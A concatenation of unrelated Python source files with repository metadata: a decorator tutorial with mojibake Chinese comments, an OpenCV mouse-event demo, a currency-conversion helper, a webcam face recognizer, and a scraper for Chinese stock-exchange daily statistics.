print(func())
# Output: Function is running
can_run = False
print(func())
# Output: Function will not run
ๅธธ่ง่ฃ
้ฅฐๅจ
https://zhuanlan.zhihu.com/p/602457512
@classmethod: ๅฃฐๆไธไธช็ฑปๆนๆณ๏ผๅฏไปฅ้่ฟ็ฑปๅ็ดๆฅ่ฐ็จใ
python็ฑปไธญๆไธ็งๆนๆณ็ฑปๅ๏ผ
Instance methods(ๅฎไพๆนๆณ)๏ผ
็ปๅฎไธไธชๅฎไพ็ๆนๆณ๏ผๅฉ็จ่ฟ็งๆนๆณๅฏไปฅ่ฎฟ้ฎๅไฟฎๆนๅฎไพๆฐๆฎใ
้่ฟ็ฑป็ๅฎไพ่ฐ็จๅฎไพๆนๆณ๏ผ้่ฟselfๅๆฐ่ฎฟ้ฎๅฎไพๆฐๆฎใ
็ฌฌไธไธชๅๆฐๆฏ่ช่บซใ
Class methods(็ฑปๆนๆณ)๏ผ
@classmethod
็ปๅฎไธไธช็ฑป็ๆนๆณ๏ผๆ ๆณๅฉ็จ่ฏฅๆนๆณไฟฎๆนๅฎไพๆฐๆฎใ
ๆฏ่ฐ็จ็ฑป่ช่บซ็ไธ็งๆนๆณ๏ผๅฎๅฐ็ฑปไฝไธบ็ฌฌไธไธชๅๆฐ๏ผ้ๅธธๅฐๅ
ถๅฝๅไธบcls
Static methods(้ๆๆนๆณ)๏ผ
@staticmethod
ไธ็ปๅฎๅฎไพๆ็ฑป็ๆนๆณใไป
ไป
ๅ ไธบไปไปฌๅจ้ป่พไธๅฑไบ้ฃไธช็ฑป๏ผๆ่ขซๅ
ๅซ่ฟๆฅใ
้ๆๆนๆณ้ๅธธ็จไบๆง่กไธ็ป็ธๅ
ณไปปๅก็ไฝฟ็จ็จๅบ็ฑปไธญ๏ผๅฆๆฐๅญฆ่ฎก็ฎใ้่ฟๅฐ็ธๅ
ณๅฝๆฐ็ป็ปๆ็ฑป็้ๆๆนๆณ๏ผไฝฟไปฃ็ ๅๅพๆดๅ ๆ็ป็ปใๆดๅฎนๆ็่งฃใ
@staticmethod: ๅฃฐๆไธไธช้ๆๆนๆณ๏ผๅฏไปฅ้่ฟ็ฑปๅ็ดๆฅ่ฐ็จใ
@property: ไธบPython็ฑป่ฎพ็ฝฎๅค็็จๅบๅ่ฎพ็ฝฎ็จๅบใ
ๅฐไธไธชๆนๆณ่ฝฌๆขไธบๅช่ฏปๅฑๆงใไนๅฏไปฅ็่งฃๆ๏ผๅฐไธไธชๆนๆณๆนๆไบ __getter__ๆนๆณใๅนถไธๅฏไปฅๆฟ่ฟไธชๆนๆณ็ปง็ปญๅฏนๅ้ข็ๆนๆณ่ฟ่ก่ฃ
้ฅฐใ
็จไบๅฏนๅฑๆง่ฟ่กไฟๆค
GettersๅSettersๆฏ้ขๅๅฏน่ฑก็ผ็จ๏ผOOP๏ผไธญ็้่ฆๆฆๅฟตใ
ๅฏนไบ็ฑปไธญ็ๆฏไธชๅฎไพๅ้๏ผgetterๆนๆณ่ฟๅๅ
ถๅผ๏ผ่setterๆนๆณ่ฎพ็ฝฎๆๆดๆฐๅ
ถๅผใ้ดไบๆญค๏ผGettersๅSettersๅๅๅซ็งฐไธบAccessorsๅMutatorsใ
ๅฎไปฌ็จไบไฟๆคๆฐๆฎไธ่ขซ็ดๆฅๆๅค่ฎฟ้ฎๆไฟฎๆนใ
ไธๅ็OOP่ฏญ่จๆไธๅ็ๆบๅถๆฅๅฎไน่ทๅๅจgettersๅsettersใๅจPythonไธญ๏ผๅฏไปฅ็ฎๅๅฐไฝฟ็จ@property่ฃ
้ฅฐๅจใ
__getter__ __setter__
้่ฟproperty่ฃ
้ฅฐๅ๏ผๅฏไปฅ็ดๆฅๅๅ้๏ผไนๅฏไปฅ้่ฟๅฝๆฐๅๅ้ใๅฝๆฐไธ่ฝๅ ()
@abstractmethod: ๅฃฐๆไธไธชๆฝ่ฑกๆนๆณ๏ผๅญ็ฑปๅฟ
้กปๅฎ็ฐๅฎใ
@wraps: ็จไบไฟ็ๅๅงๅฝๆฐ็ๅ
ๆฐๆฎ๏ผๅฆๅฝๆฐๅใๆณจ้็ญ๏ผใ
ๅๅปบ่ฃ
้ฅฐๅจ็ๆถๅไฝฟ็จใ็จไบไฟ็ๅๅงๅฝๆฐ็ๅ
ๆฐๆฎ๏ผๅฆๅฝๆฐๅใๆณจ้็ญ๏ผใ
@lru_cache๏ผๅฉ็จ็ผๅญๆ้็จๅบใๆฏๆ้Pythonๅฝๆฐๆ็ฎๆ็ๆนๆณ
ๆญค่ฃ
้ฅฐๅจๅฐๅฝๆฐ็็ปๆๆพๅ
ฅ็ผๅญ๏ผไพๅ็ปญๅ
ทๆ็ธๅๅๆฐ็ๅฝๆฐ่ฐ็จ๏ผๆ ้ๅๆฌกๆง่กๅ
ทๆ็ธๅๅๆฐ็ๅฝๆฐใ
@total_ordering: ๅกซๅ
็ผบๅคฑๆๅบๆนๆณ็็ฑป่ฃ
้ฅฐๅจ
ๅฝๆฐๅทฅๅ
ทๆจกๅไธญ็@total_sordeng่ฃ
้ฅฐๅจไธบ้ขๅฎไนPython็ฑป็ๆ็ผบๅคฑๆฏ่พๆนๆณใ
ๅจ็ฑปไธญๆฒกๆๅฏน__ge__ใ__gt__ๅ__le__ๆนๆณ่ฟ่กๅฎไนใๅฏน่ฏฅ็ฑป็ๅฏน่ฑก่ฟ่กๆฏ่พๆฏไผๆ้ฎ้ขใ่ฟไธช่ฃ
้ฅฐๅจไผ่กฅๅ
็ผบๅคฑ็ๆฏ่พๆนๆณ
ไธไบๆง็็ฑปๅฏ่ฝๆชๅ
ๅๅฎไนๆฏ่พๆนๆณ๏ผๅฐ@total_ordering่ฃ
้ฅฐๅจๆทปๅ ๅฐๅ
ถไธญไนๅ๏ผๅ็ปญ็ไฝฟ็จๆดๅ ๅฎๅ
จใ
@contextmanager:ๅฎๅถ็่ฏญๅข็ฎก็ๅจ
ๅฏไปฅไฝฟ็จwith่ฏญๅฅๆๅผๆไปถ๏ผๅจๅๅ
ฅไนๅๅฐ่ชๅจๅ
ณ้ญใๆ ้ๆพๅผๅฐ่ฐ็จf.close๏ผ๏ผๅฝๆฐๆฅๅ
ณ้ญ่ฏฅๆไปถใ
@cached_property:ๅฐๆนๆณ็็ปๆไฝไธบๅฑๆงๆพๅ
ฅ็ผๅญ
Python 3.8็ๅฝๆฐๅทฅๅ
ทๆจกๅๅผๅ
ฅไบไธไธชๆฐ็ๅ่ฝๅผบๅคง็่ฃ
้ฅฐๅจ-@cached_property๏ผๅฎๅฐ็ฑป็ๆนๆณ่ฝฌๆขไธบไธไธชๅฑๆง๏ผ่ฎก็ฎๅบ่ฏฅๅฑๆง็ๅผไนๅ๏ผๅฐๅ
ถไฝไธบๅฎไพ็ๆฎ้ๅฑๆงๆพๅ
ฅ็ผๅญใ
@dataclass:็จๆดๅฐ็ไปฃ็ ๅฎไนไธ็จ็ฑป
๏ผๅจPython3.7ไธญๅผๅ
ฅ๏ผๅฏไปฅ่ชๅจไธบไธไธช็ฑป็ๆๅ ็งไธ็จ็ๆนๆณ๏ผๅฆ__init__ใ__repr__ใ__eq__ใ__lt__็ญใ
@atexit.register:ๆณจๅไธไธช็จๅบๆญฃๅธธ็ปๆญข็ๅฝๆฐ
atexitๆจกๅ็@register่ฃ
้ฅฐๅจๅ
่ฎธๅจPython่งฃ้ๅจ้ๅบๆถๆง่กไธไธชๅฝๆฐใ
@login_required: ็จไบ้ๅถ้่ฆ็จๆท็ปๅฝๆ่ฝ่ฎฟ้ฎ็่งๅพๅฝๆฐใ
@cache: ็ผๅญๅฝๆฐ็็ปๆ๏ผ้ฟๅ
้ๅค่ฎก็ฎใ
@retry: ๅจๅ็้่ฏฏๆถ่ชๅจ้่ฏไปฃ็ ๅไธๅฎๆฌกๆฐใ
้่ฆ่ชๅทฑๅฎไน
ๅฝๆฐ
ๅฝๆฐๅฏไปฅ่ตๅผ
ๅฝๆฐไธญๅฏไปฅๅฎไนๅฝๆฐ(ๅฝๆฐไธญๅฎไน็ๅฝๆฐ๏ผๅจๅฝๆฐๅคๆ ๆณ่ฎฟ้ฎ)
ๅฝๆฐๅฏไปฅ่ฟๅๅฝๆฐ
funcName() ๆง่กๅฝๆฐ
funcName()
funcName ๆๅฝๆฐๆดไฝ่ตๅผ็ปๅฆๅคไธไธชๅ้
a1 = funcName
a1()
"""
"""
ไธๅ็ๅฏน่ฑก
"""
"""
ๅฝๆฐ่ตๅผไฝฟ็จๅฎไพ
"""
def hi(name="renxw"):
return "hi " + name
"""
ๅฝๆฐไธญๅฎไนๅฝๆฐ
ๅฝๆฐไธญๅฎไน็ๅฝๆฐ๏ผๅจๅฝๆฐๅคไธ่ฝ่ขซ่ฎฟ้ฎ
"""
def hiFun01(name="renxw"):
print("now you are inside the hiFun01() function")
def hiFun02():
return "now you are in the hiFun02() function"
def hiFun03():
return "now you are in the hiFun03() function"
print(hiFun02())
print(hiFun03())
print("now you are back in the hiFun01() function")
"""
ไปๅฝๆฐไธญ่ฟๅๅฝๆฐ
"""
def hiFun04(name="renxw"):
print("now you are inside the hiFun04() function")
def hiFun02():
return "now you are in the hiFun02() function"
def hiFun03():
return "now you are in the hiFun03() function"
if name == "renxw":
return hiFun02
else:
return hiFun03
"""
ๅฝๆฐ็ปไน
"""
def hiFunTest():
print("ๅฝๆฐ่ตๅผ")
print(hi())
hi01 = hi
print(hi01())
# ๅฏไปฅๅ ้คhi01๏ผๅ ้คhiๆฅ้
# del hi01
# del hi
# print(hi())
# print(hi01())
print("ๅจๅฝๆฐไธญๅฎไนๅฝๆฐ")
hiFun01()
print("ไปๅฝๆฐไธญ่ฟๅๅฝๆฐ")
hiFun05 = hiFun04()
print(hiFun05())
"""
่ฃ
้ฅฐๅจ็ปไน
"""
"""
่ฃ
้ฅฐๅจๅฝๆฐๅฎไน
functools.wraps ๆๆ่ฃ
้ฅฐ็ๅฝๆฐ
@wraps(a01Fun)
ๆฅๅไธไธชๅฝๆฐๆฅ่ฟ่ก่ฃ
้ฅฐ๏ผๅนถๅ ๅ
ฅไบๅคๅถๅฝๆฐๅ็งฐใๆณจ้ๆๆกฃใๅๆฐๅ่กจ็ญๅ่ฝใ
่ฟๅฏไปฅ่ฎฉๆไปฌๅจ่ฃ
้ฅฐๅจ้้ข่ฎฟ้ฎๅจ่ฃ
้ฅฐไนๅ็ๅฝๆฐ็ๅฑๆง
"""
def a01Decorator(a01Fun):
@wraps(a01Fun)
def wrapTheFunction():
print("I am doing some boring work before executing a01Fun()")
a01Fun()
print("I am doing some boring work after executing a01Fun()")
return wrapTheFunction
"""
@ๆๆ่ฃ
้ฅฐๅจ
ๅจๆๆ่ฃ
้ฅฐๅจๅ๏ผๅจไฝฟ็จๅฝๆฐ็ๆถๅๅฐฑๅฏไปฅ็ดๆฅไฝฟ็จ่ฃ
้ฅฐๅ็ๅ่ฝ๏ผไธ้่ฆๅไฝฟ็จ่ฃ
้ฅฐๅจ่ฟ่กๅ
่ฃ
่ตๅผไบ
"""
@a01Decorator
def a02Fun():
print("I am the function which needs some decoration to remove my foul smell")
"""
่ฃ
้ฅฐๅจ็ปไน
"""
def decoratorLearn():
a02Fun()
print(a02Fun.__name__)
# a03Fun = a01Decorator(a02Fun)
# a03Fun()
# print(a03Fun.__name__)
return
"""
ๅ
็ฝฎ่ฃ
้ฅฐๅจ็ปไน
"""
class IterClass:
def __init__(self):
self._score = 0
@property
def score1(self):
return self._score
@score1.setter
def score(self, s):
if 0 <= s <= 100:
self._score = s
else:
            raise Exception("score out of range: only 0-100 is allowed")
@dataclass
class Point:
"""@dataclass่ฃ
้ฅฐๅจ็ปไน """
x: float
y: float
def point_func():
point = Point(1.0, 2.0)
print(point)
"""่ชๅฎไน่ฃ
้ฅฐๅจretry"""
def retry(max_retries=3, timeout=1):
"""
ๅฎไน่ฃ
้ฅฐ๏ผ็จไบๅฝๆฐ้่ฏ๏ผๅ็ญๅพ
้่ฏๆถ้ฟใ
่ฟ้้ข็ๅๆฐๆถ่ฃ
้ฅฐๅจๅฝๆฐๆฌ่บซ็ๅๆฐ
:param max_retries: ๆๅคง้่ฏๆฌกๆฐ
:param timeout: ่ฎพ็ฝฎ่ถ
ๆถ้่ฏๆถ้ฟ
:return:
"""
def decorator(func):
"""
ๅฎไน่ฃ
้ฅฐๅจๅๅฐ่ฃ
้ฅฐๅจ่ฟๅ
:param func: ไปฅๅฝๆฐๅผ็ผ็จ็ๆนๅผ๏ผไฝฟ็จๅๆฐๆฅๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๅฝๆฐๅ๏ผๅจ่ฃ
้ฅฐๅจไธญไฝฟ็จ func() ่ฟ่กๆง่กๅฝๆฐ
:return: wrapper(่ขซ่ฃ
้ฅฐไนๅ็ๅฝๆฐๅ๏ผๅจๅฝๆฐ่ขซ่ฃ
้ฅฐไนๅ๏ผ่ฐ็จๅซ่ฃ
้ฅฐๅฝๆฐ็ๆถๅ๏ผๅฎ้
ไธ่ฐ็จ็ๅฐฑๆฏwrapperๅฝๆฐ)
"""
@wraps(func)
def wrapper(*args, **kwargs):
"""
ๅฎไน่ขซ่ฃ
้ฅฐๅฝๆฐ๏ผ่ขซ่ฃ
้ฅฐไนๅ็ๅฝๆฐๅ่ฝ
่ฟ้็ๅๆฐๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๅๆฐ
@wraps(func): ่ฟ้ๅฏไปฅไฝฟ็จwraps็จๆฅๆ ่ฏ่ฃ
้ฅฐๅจ๏ผๅนถไธๆฅๆถfuncๅฝๆฐๅใไธๅไนๅฏไปฅ
@wrapsๆฅๅไธไธชๅฝๆฐๆฅ่ฟ่ก่ฃ
้ฅฐ๏ผๅนถๅ ๅ
ฅไบๅคๅถๅฝๆฐๅ็งฐใๆณจ้ๆๆกฃใๅๆฐๅ่กจ็ญ็ญ็ๅ่ฝใ่ฟๅฏไปฅ่ฎฉๆไปฌๅจ่ฃ
้ฅฐๅจ้้ข่ฎฟ้ฎๅจ่ฃ
้ฅฐไนๅ็ๅฝๆฐ็ๅฑๆงใ
:param args: (ๅฝขๅ)(ๅ
็ป)็จไบๆฅๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๆๆ้ๅ
ณ้ฎๅญๅๆฐ
:param kwargs: (ๅฝขๅ)(ๅญๅ
ธ)็จไบๆฅๆถ่ขซ่ฃ
้ฅฐๅฝๆฐ็ๆๆๅ
ณ้ฎๅญๅๆฐ
:return:
"""
"""ไฝฟ็จๅพช็ฏ็ๆนๅผๅฏน่ขซ่ฃ
้ฅฐๅฝๆฐ่ฟ่ก้่ฏ"""
retries = 0
exce_type = 0
while retries < max_retries:
try:
"""
args: (ๅฎๅ)ๅฐ้่ฟwrapperๅฝๆฐๆฅๆถๅฐ็่ขซ่ฃ
้ฅฐๅฝๆฐ็้ๅ
ณ้ฎๅญๅๆฐ็ๅๆฐ้ๅ(ๅ
็ป)๏ผไฝฟ็จ*่ฟ่กๅฑๅผ๏ผๅฐๅ
ถไธญๆๆๅ
็ด ๅ็ฌไผ ้็ป่ขซ่ฃ
้ฅฐๅฝๆฐ
kwargs: (ๅฎๅ)ๅฐ้่ฟwrapperๅฝๆฐๆฅๆถๅฐ็่ขซ่ฃ
้ฅฐๅฝๆฐ็ๅ
ณ้ฎๅญๅๆฐ็ๅๆฐ้ๅ(ๅญๅ
ธ)๏ผไฝฟ็จ**่ฟ่กๅฑๅผ๏ผๅฐๅ
ถไธญๆๆๅ
็ด (้ฎ:ๅผๅฏน)ๅ็ฌไผ ้็ป่ขซ่ฃ
้ฅฐๅฝๆฐ
1ใๅฐ่ขซ่ฃ
้ฅฐๅฝๆฐๆๆๅๆฐไผ ้็ป่ขซ่ฃ
้ฅฐๅฝๆฐ
2ใๆง่ก่ขซ่ฃ
้ฅฐๅฝๆฐ
3ใ่ฟๅ่ขซ่ฃ
้ฅฐๅฝๆฐ็returnๅผ(่ขซ่ฃ
้ฅฐๅฝๆฐ็่ฟๅๅผ้่ฆๅ็ฌ่ฟๅ๏ผ่ฆไธ็ถๆ ๆณ่ขซๅผ็จ)
ๆณจๆ็น๏ผ
ๅฆๆfuncๆง่กๆฒกๆๅผๅธธ๏ผๅฐฑไผ็ดๆฅๆง่กreturn่ฏญๅฅๅฐfunc็ปๆ่ฟๅ๏ผ้ฃๅฐฑไธไผๅ่ฟ่กๅพช็ฏไบใ่ไธไผๅจfuncๆญฃๅธธ็ๆ
ๅตไธ่ฟๅฐfuncๅพช็ฏๆง่กไธๆฌก
"""
return func(*args, **kwargs)
except BaseException as e:
"""้่ฏๆฌกๆฐ+1"""
retries += 1
"""ๆๅๅคฑ่ดฅๆถ๏ผๅฐๅคฑ่ดฅๅๅ ่ฟ่กไฟๅญ๏ผ่ฟ่ก่พๅบ๏ผ"""
exce_type = e if retries == max_retries else None
"""่พๅบๅคฑ่ดฅๆฅๅฟ"""
print(f"ๆง่ก {func.__name__} ๅคฑ่ดฅ๏ผๆญฃๅจ่ฟ่ก็ฌฌ {retries} ๆฌก้่ฏ๏ผ")
"""ๅคฑ่ดฅ้่ฏ๏ผ็ญๅพ
ๆถ้ด"""
time.sleep(timeout)
"""
ๆ็ปๅคฑ่ดฅๅๅฐๅผๅธธๆๅบ๏ผๅนถไธๅฐๅคฑ่ดฅไฟกๆฏ่ฟ่กๆ็คบ๏ผ
ๅผๅธธๆๅบ็ๆถๅไฝฟ็จไนๅๅญๅจๅฅฝ็ๅผๅธธ้ๅ๏ผ่ทๅๅผๅธธ็ฑปๅ๏ผๅ็กฎ็่ฟ่กๅผๅธธไฟกๆฏ่พๅบ
"""
raise exce_type.__class__(f"ๆง่ก {func.__name__} ๅคฑ่ดฅ๏ผๅทฒ่พพๅฐๆๅคง้่ฏๆฌกๆฐ๏ผๆ็ป็ๅคฑ่ดฅๅๅ ๆฏ {exce_type}๏ผ")
"""ๅฝๆฐๅผ็ผ็จ:ๅฐ่ขซ่ฃ
้ฅฐๅจ่ฃ
้ฅฐๅ็็ๅฝๆฐๅ่ฟๅ"""
return wrapper
"""ๅฝๆฐๅผ็ผ็จ:ๅฐ่ฃ
้ฅฐๅจๅฝๆฐ็ๅฝๆฐๅ่ฟๅ"""
return decorator
@retry(max_retries=3, timeout=1)
def retry_test():
"""
@retry: ไฝฟ็จ่ฃ
้ฅฐๅจretryๅฏนๅฝๆฐ่ฟ่ก่ฃ
้ฅฐ
max_retries: ไผ ้็ป่ฃ
้ฅฐๅจ็ๅๆฐ
timeout: ไผ ้็ป่ฃ
้ฅฐๅจ็ๅๆฐ
:return:
"""
print("retryๆต่ฏ")
    raise IOError("exception raised on purpose to exercise the retry decorator")
return 1
@retry(max_retries=10, timeout=3)
def sum_num(x, y):
a = x + y
    # raise IOError("exception raised on purpose to exercise the retry decorator")
return a
"""
้ๅฝ็ปไน
x! x็้ถไน็ๅฎ็ฐ
"""
def factorial(x):
if x == 1:
return 1
else:
return x * factorial(x - 1)
"""
้ๅฝ็ปไน
"""
def recursionLearn():
print(factorial(10))
if __name__ == "__main__":
# print("่ฟญไปฃๅจ็ปไน ")
# mapLearn()
# print("็ๆๅจ็ปไน ")
# yieldLearn()
# print("ๅฝๆฐๅผ็ผ็จ้ซ้ถๅฝๆฐ-map็ปไน ")
# mapLearn()
# print("ๅฝๆฐๅผ็ผ็จ้ซ้ถๅฝๆฐ-filter็ปไน ")
# filterLearn()
# print("ๅฝๆฐๅผ็ผ็จ้ซ้ถๅฝๆฐ-reduce็ปไน ")
# reduceLearn()
# print("ๅฝๆฐ็ปไน ")
# hiFunTest()
    # print("decorator practice")
    # decoratorLearn()
    print("built-in decorator practice")
ic = IterClass()
ic.score = 10
print(ic.score)
print(ic.score1)
ic.score = 100
print(ic.score)
print(ic.score1)
point_func()
# print("้ๅฝ็ปไน ")
# recursionLearn()
|
renxiaowei-1991/pythonLearn
|
a01PythonLearn/package/b01PythonLearn/c23ClassHighLearn.py
|
c23ClassHighLearn.py
|
py
| 24,298
|
python
|
zh
|
code
| 0
|
github-code
|
6
|
37176092039
|
import numpy as np
import cv2
# Check available mouse events available with opencv library
# events = [i for i in dir(cv2) if 'EVENT' in i]
# print(events)
# General Callback function used for handling mouse events
def click_event(event, x, y, flags, param):
# Show x and y coordinate
if event == cv2.EVENT_LBUTTONDOWN:
print(x, ', ', y)
font = cv2.FONT_HERSHEY_SIMPLEX
strXY = str(x) + ', ' + str(y)
cv2.putText(img, strXY, (x, y), font, .5, (255, 255, 0), 2)
cv2.imshow('image', img)
# Show B, G and R channel
if event == cv2.EVENT_RBUTTONDOWN:
blue = img[y, x, 0]
green = img[y, x, 1]
red = img[y, x, 2]
font = cv2.FONT_HERSHEY_SIMPLEX
strBGR = str(blue) + ', ' + str(green) + ', ' + str(red)
cv2.putText(img, strBGR, (x, y), font, .5, (0, 255, 255), 2)
cv2.imshow('image', img)
# Create image from numpy
# img = np.zeros((512, 512, 3), np.uint8)
img = cv2.imread('data/images/messi.jpg')
img = cv2.resize(img, (512, 512))
# 'image' is windows title
cv2.imshow('image', img)
# setMouseCallback calls Function click_event
cv2.setMouseCallback('image', click_event)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
sbhrwl/object_detection
|
src/opencv/mouse_events/handle_mouse_event.py
|
handle_mouse_event.py
|
py
| 1,226
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8101165169
|
import requests
import json
from config import keys
class ConvertionException(Exception):
pass
class CryptoConverter:
@staticmethod
def get_price(quote: str, base: str, amount: str):
if quote == base:
raise ConvertionException(f'ะั ะฒะฒะตะปะธ ะพะดะธะฝะฐะบะพะฒัะต ะฒะฐะปััั {base}.')
try:
quote_ticker = keys[quote]
except KeyError:
raise ConvertionException(f'ะะต ัะดะฐะปะพัั ะพะฑัะฐะฑะพัะฐัั ะฒะฐะปััั {quote}')
try:
base_ticker = keys[base]
except KeyError:
raise ConvertionException(f'ะะต ัะดะฐะปะพัั ะพะฑัะฐะฑะพัะฐัั ะฒะฐะปััั {base}')
try:
amount = float(amount)
except ValueError:
raise ConvertionException(f'ะะต ัะดะฐะปะพัั ะพะฑัะฐะฑะพัะฐัั ะบะพะปะปะธัะตััะฒะพ {amount}.')
r = requests.get(f'https://min-api.cryptocompare.com/data/price?fsym={quote_ticker}&tsyms={base_ticker}')
total_base = json.loads(r.content)
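        # the price endpoint answers with {target_ticker: rate}; scale the rate by the requested amount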
new_price = total_base[keys[base]] * amount
new_price = round(new_price, 3)
message = f"ะฆะตะฝะฐ {amount} {keys[quote]} ะฒ {keys[base]} : {new_price}"
return message
|
voxvt/botexam
|
utils.py
|
utils.py
|
py
| 1,270
|
python
|
ru
|
code
| 0
|
github-code
|
6
|
70968292347
|
import cv2
import numpy as numpy
import os
detector = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read("trainer/trainer.yml")
font = cv2.FONT_HERSHEY_SIMPLEX
id = 0
name = ['none', 'Godswill', 'Ebere', 'Godswill', 'handle']
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector.detectMultiScale(gray, 1.1, 2)
for (x,y,w,h) in faces:
cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 0, 0), 3)
        id, confidence = recognizer.predict(gray[y:y+h, x:x+w])
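        # LBPH 'confidence' is a distance, so smaller values mean a closer match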
if (confidence <= 100):
id = name[id]
confidence = "{0}%".format(round(100-confidence))
else:
id = "Unknown"
confidence = "{}%".format(round(100-confidence))
cv2.putText(frame, str(id), (x+5, y-5), font, 1, (255, 0, 0), 2)
cv2.putText(frame, str(confidence), (x+5, y+h-5), font, 1, (255, 0, 0), 2)
cv2.imshow("Frame", frame)
k = cv2.waitKey(30) & 0xff
    if k == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
awesomegusS/cv
|
recognizer.py
|
recognizer.py
|
py
| 1,158
|
python
|
en
|
code
| 0
|
github-code
|
6
|
21141233312
|
import datetime
import json
import os
import time
import pandas as pd
import requests
from mystockdata import config, db
from mystockdata.db import DatetimeIndexMixin, PrefixedDfDb
from mystockdata.exceptions import HistoryDataError
class ShSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sh_se_'
class CybSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'cyb_se_'
class SzSeDb(DatetimeIndexMixin, PrefixedDfDb):
prefix = 'sz_se_'
class SzzbSeDb(DatetimeIndexMixin, PrefixedDfDb,):
prefix = 'szzb_se_'
class ZxqySeDb(DatetimeIndexMixin, PrefixedDfDb, ):
prefix = 'zxqy_se_'
class SSE:
sedb = ShSeDb()
def read_cache(self):
df = self.sedb.read()
return df
def write_cache(self, df):
df = self.sedb.save(df)
def get_sse_overview_day(self):
'''
source: http://www.sse.com.cn/market/stockdata/overview/day/
'''
def _fetch(date):
url = ('http://query.sse.com.cn/marketdata/tradedata',
'/queryTradingByProdTypeData.do?jsonCallBack=jsonpCallback74321',
'&searchDate=[DAY]&prodType=gp&_=1456558103149')
headers = {
'Host': 'www.sse.com.cn',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
'Referer': 'http://www.sse.com.cn/market/stockdata/overview/day/',
}
real_url = ''.join(url).replace('[DAY]', date.strftime("%Y-%m-%d"))
rst = requests.get(url=real_url, headers=headers).text
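            # strip the JSONP envelope (the "jsonpCallback74321(...)" wrapper) so the payload parses as plain JSON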
json_str = rst[19:len(rst) - 1]
rst_list = json.loads(json_str)
rst_list = rst_list['result']
headers = ['istVol', 'SH_profitRate1', 'SH_negotiableValue1', 'SH_trdAmt1', 'SH_trdVol1', 'SH_trdTm1',
'A_istVol', 'A_profitRate1', 'A_negotiableValue1', 'A_trdAmt1', 'A_trdVol1', 'A_trdTm1',
'B_istVol', 'B_profitRate1', 'B_negotiableValue1', 'B_trdAmt1', 'B_trdVol1', 'B_trdTm1']
tmp_dict = dict()
for key, value in rst_list[0].items():
tmp_dict['A_' + key] = value if value else None
for key, value in rst_list[1].items():
tmp_dict['B_' + key] = value if value else None
for key, value in rst_list[2].items():
tmp_dict['SH_' + key] = value if value else None
return pd.DataFrame([tmp_dict, ], index=[date, ])
def _fetch_dates(begin, end, to_df=True):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date))
# print(tmp[-1])
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
# print(pd.concat(tmp))
return pd.concat(tmp)
cache_df = self.read_cache()
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(
start, datetime.datetime.now())
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df)
return df
class SZSE:
dbs = {'sz': SzSeDb(), 'cyb': CybSeDb(),
'zxqy': ZxqySeDb(), 'szzb': SzzbSeDb()}
def read_cache(self, category):
df = self.dbs[category].read()
return df
def write_cache(self, df, category):
df = self.dbs[category].save(df)
def get_szse_overview_day(self, category):
'''
source: http://www.szse.cn/main/marketdata/tjsj/jbzb/
'''
def _fetch(date, category):
urls = {
'sz':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab1'),
# ๆทฑๅณไธปๆฟ
'szzb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab2'),
# ไธญๅฐไผไธๆฟ
'zxqy':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab3'),
# ๅไธๆฟ
'cyb':
('http://www.szse.cn/szseWeb/ShowReport.szse?',
'SHOWTYPE=EXCEL&CATALOGID=1803&txtQueryDate=%s&ENCODE=1&TABKEY=tab4')}
df = pd.read_html(''.join(urls[category]) % date.strftime(
"%Y-%m-%d"), encoding='gbk', header=0)[0]
if df.columns[0] == 'ๆฒกๆๆพๅฐ็ฌฆๅๆกไปถ็ๆฐๆฎ๏ผ':
return None
if category in ('szzb', 'cyb', 'zxqy'):
del df['ๆฏไธๆฅๅขๅ']
del df['ๆฌๅนดๆ้ซ']
del df['ๆ้ซๅผๆฅๆ']
if category == 'sz':
del df['ๆฏไธๆฅๅขๅ']
                del df['幅度%']
del df['ๆฌๅนดๆ้ซ']
del df['ๆ้ซๅผๆฅๆ']
df = pd.pivot_table(df, columns='ๆๆ ๅ็งฐ')
df.index = pd.DatetimeIndex([date.strftime("%Y-%m-%d")])
return df
def _fetch_dates(begin, end, category):
tmp = []
print(begin, end)
dates = pd.date_range(begin, end)
if len(dates) == 1:
return None
for date in dates:
tmp.append(_fetch(date, category))
if len(dates) > 1:
print('sleep')
time.sleep(0.5)
return pd.concat(tmp)
cache_df = self.read_cache(category)
if cache_df is None or cache_df.empty:
raise HistoryDataError()
else:
start = max(cache_df.index) + datetime.timedelta(days=-1)
new_df = _fetch_dates(start, datetime.datetime.now(), category)
if new_df is not None:
cache_df = cache_df.drop(new_df.index, errors='ignore')
df = pd.concat([cache_df, new_df])
if len(df) > len(cache_df):
self.write_cache(df, category)
return df
class SE:
@classmethod
def get_overview_day_field(cls, f_sha, f_shb, f_sh, f_sz, f_cyb, f_zxqy, f_szzb):
